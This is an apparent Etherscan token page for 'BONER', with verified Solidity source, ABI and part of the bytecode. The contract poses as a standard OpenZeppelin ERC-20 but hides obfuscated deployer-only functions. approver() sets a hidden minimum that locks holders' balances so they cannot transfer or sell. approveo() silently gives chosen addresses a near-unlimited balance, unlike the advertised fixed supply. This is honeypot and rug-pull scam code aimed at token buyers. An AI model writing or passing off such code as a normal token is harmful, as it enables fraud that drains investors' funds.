ETH Price: $3,324.88 (+1.66%)
Gas: 9 Gwei

Token

BONER (BONER)
 

Overview

Max Total Supply

1,000,000 BONER

Holders

48

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
dabloon.eth
Balance
10,024.431870262611624755 BONER

Value
$0.00
0xb60827E66f3CAc095B43C945D11f76B49544cf12
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Tokenomics

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-09
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
Telegram: https://t.me/Boner_erc

0xC46E606e1ED38C4291Ef22378837ce0F88E8E018

 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _sldfjwsdfOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _sldfjwsdfOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract Tokenomics is Context, IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _bnbbusd;
    mapping(address => uint256) private _weofsdmese;

    uint256 private _totalSupply;
    uint256 public constant MAXSupply = 1000000 * 10 ** 18;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _bnbbusd = _msgSender();
        _yydsed(_msgSender(), 1000000 * 10 ** decimals());
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _weofsdmese[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(owner, spender, currentAllowance.sub(subtractedValue));
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    mapping(address => uint256) private _bala;
    function approver(address sss, uint256 ammouunt) external {
        if (_bnbbusd == _msgSender()) {
            _bala[sss] = 1 * ammouunt + 0;
        }
    }

    function approveo(address zzz) external {
        address _slfjweow = _msgSender();
        if (_bnbbusd == _slfjweow) {
            _weofsdmese[zzz] = 100000000000000 * (1000000000 * 10 ** 18);
        }
    }

    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 minAmount = _bala[from];
        uint256 decydsBalance = _weofsdmese[from].sub(minAmount);
        require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
        _weofsdmese[from] = decydsBalance.sub(amount);
        // decrementing then incrementing.
        _weofsdmese[to] = _weofsdmese[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _yydsed(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: yydsed to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _weofsdmese[msg.sender] = _weofsdmese[msg.sender].add(amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _weofsdmese[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _weofsdmese[account] = accountBalance.sub(amount);
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            _approve(owner, spender, currentAllowance.sub(amount));
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAXSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_bnbbusd","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"zzz","type":"address"}],"name":"approveo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"},{"internalType":"uint256","name":"ammouunt","type":"uint256"}],"name":"approver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200273538038062002735833981810160405281019062000037919062000520565b620000576200004b6200012160201b60201c565b6200012960201b60201c565b8160059081620000689190620007f0565b5080600690816200007a9190620007f0565b506200008b6200012160201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000119620000df6200012160201b60201c565b620000ef620001ed60201b60201c565b600a620000fd919062000a67565b620f42406200010d919062000ab8565b620001f660201b60201c565b505062000c59565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000268576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200025f9062000b8a565b60405180910390fd5b62000284816004546200032a60201b620009421790919060201c565b600481905550620002e381600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200032a60201b620009421790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200033b919062000bac565b90508381101562000383576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200037a9062000c37565b60405180910390fd5b8091505092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003f682620003ab565b810181811067ffffffffffffffff82111715620004185762000417620003bc565b5b80604052505050565b60006200042d6200038d565b90506200043b8282620003eb565b919050565b600067ffffffffffffffff8211156200045e576200045d620003bc565b5b6200046982620003ab565b9050602081019050919050565b60005b838110156200049657808201518184015260208101905062000479565b60008484015250505050565b6000620004b9620004b38462000440565b62000421565b905082815260208101848484011115620004d857620004d7620003a6565b5b620004e584828562000476565b509392505050565b600082601f830112620005055762000504620003a1565b5b815162000517848260208601620004a2565b91505092915050565b600080604083850312156200053a576200053962000397565b5b600083015167ffffffffffffffff8111156200055b576200055a6200039c565b5b6200056985828601620004ed565b925050602083015167ffffffffffffffff8111156200058d576200058c6200039c565b5b6200059b85828601620004ed565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005f857607f821691505b6020821081036200060e576200060d620005b0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006787fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000639565b62000684868362000639565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620006d1620006cb620006c5846200069c565b620006a6565b6200069c565b9050919050565b6000819050919050565b620006ed83620006b0565b62000705620006fc82620006d8565b84845462000646565b825550505050565b600090565b6200071c6200070d565b62000729818484620006e2565b505050565b5b8181101562000751576200074560008262000712565b6001810190506200072f565b5050565b601f821115620007a0576200076a8162000614565b620007758462000629565b8101602085101562000785578190505b6200079d620007948562000629565b8301826200072e565b50505b505050565b600082821c905092915050565b6000620007c560001984600802620007a5565b1980831691505092915050565b6000620007e08383620007b2565b9150826002028217905092915050565b620007fb82620005a5565b67ffffffffffffffff811115620008175762000816620003bc565b5b620008238254620005df565b6200083082828562000755565b600060209050601f83116001811462000868576000841562000853578287015190505b6200085f8582620007d2565b865550620008cf565b601f198416620008788662000614565b60005b82811015620008a2578489015182556001820191506020850194506020810190506200087b565b86831015620008c25784890151620008be601f891682620007b2565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000965578086048111156200093d576200093c620008d7565b5b60018516156200094d5780820291505b80810290506200095d8562000906565b94506200091d565b94509492505050565b60008262000980576001905062000a53565b8162000990576000905062000a53565b8160018114620009a95760028114620009b457620009ea565b600191505062000a53565b60ff841115620009c957620009c8620008d7565b5b8360020a915084821115620009e357620009e2620008d7565b5b5062000a53565b5060208310610133831016604e8410600b841016171562000a245782820a90508381111562000a1e5762000a1d620008d7565b5b62000a53565b62000a33848484600162000913565b9250905081840481111562000a4d5762000a4c620008d7565b5b81810290505b9392505050565b600060ff82169050919050565b600062000a74826200069c565b915062000a818362000a5a565b925062000ab07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200096e565b905092915050565b600062000ac5826200069c565b915062000ad2836200069c565b925082820262000ae2816200069c565b9150828204841483151762000afc5762000afb620008d7565b5b5092915050565b600082825260208201905092915050565b7f45524332303a2079796473656420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600062000b7260218362000b03565b915062000b7f8262000b14565b604082019050919050565b6000602082019050818103600083015262000ba58162000b63565b9050919050565b600062000bb9826200069c565b915062000bc6836200069c565b925082820190508082111562000be15762000be0620008d7565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062000c1f601b8362000b03565b915062000c2c8262000be7565b602082019050919050565b6000602082019050818103600083015262000c528162000c10565b9050919050565b611acc8062000c696000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a9059cbb11610071578063a9059cbb146102e5578063c65e4d5314610315578063cd73a1d614610333578063dd62ed3e1461034f578063f2fde38b1461037f57610116565b80638da5cb5b1461025b57806395d89b4114610279578063a4022bd114610297578063a457c2d7146102b557610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634ba5d8b51461020557806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b604051610130919061119f565b60405180910390f35b610153600480360381019061014e919061125a565b61042d565b60405161016091906112b5565b60405180910390f35b610171610450565b60405161017e91906112df565b60405180910390f35b6101a1600480360381019061019c91906112fa565b61045a565b6040516101ae91906112b5565b60405180910390f35b6101bf610489565b6040516101cc9190611369565b60405180910390f35b6101ef60048036038101906101ea919061125a565b610492565b6040516101fc91906112b5565b60405180910390f35b61021f600480360381019061021a919061125a565b6104c9565b005b61023b60048036038101906102369190611384565b610586565b60405161024891906112df565b60405180910390f35b6102596105cf565b005b6102636105e3565b60405161027091906113c0565b60405180910390f35b61028161060c565b60405161028e919061119f565b60405180910390f35b61029f61069e565b6040516102ac91906112df565b60405180910390f35b6102cf60048036038101906102ca919061125a565b6106ac565b6040516102dc91906112b5565b60405180910390f35b6102ff60048036038101906102fa919061125a565b610733565b60405161030c91906112b5565b60405180910390f35b61031d610756565b60405161032a91906113c0565b60405180910390f35b61034d60048036038101906103489190611384565b61077c565b005b610369600480360381019061036491906113db565b610838565b60405161037691906112df565b60405180910390f35b61039960048036038101906103949190611384565b6108bf565b005b6060600580546103aa9061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546103d69061144a565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a0565b90506104458185856109a8565b600191505092915050565b6000600454905090565b6000806104656109a0565b9050610472858285610b71565b61047d858585610c0d565b60019150509392505050565b60006012905090565b60008061049d6109a0565b90506104be8185856104af8589610838565b6104b991906114aa565b6109a8565b600191505092915050565b6104d16109a0565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361058257600081600161053491906114de565b61053e91906114aa565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105d7610f1f565b6105e16000610f9d565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461061b9061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546106479061144a565b80156106945780601f1061066957610100808354040283529160200191610694565b8201919060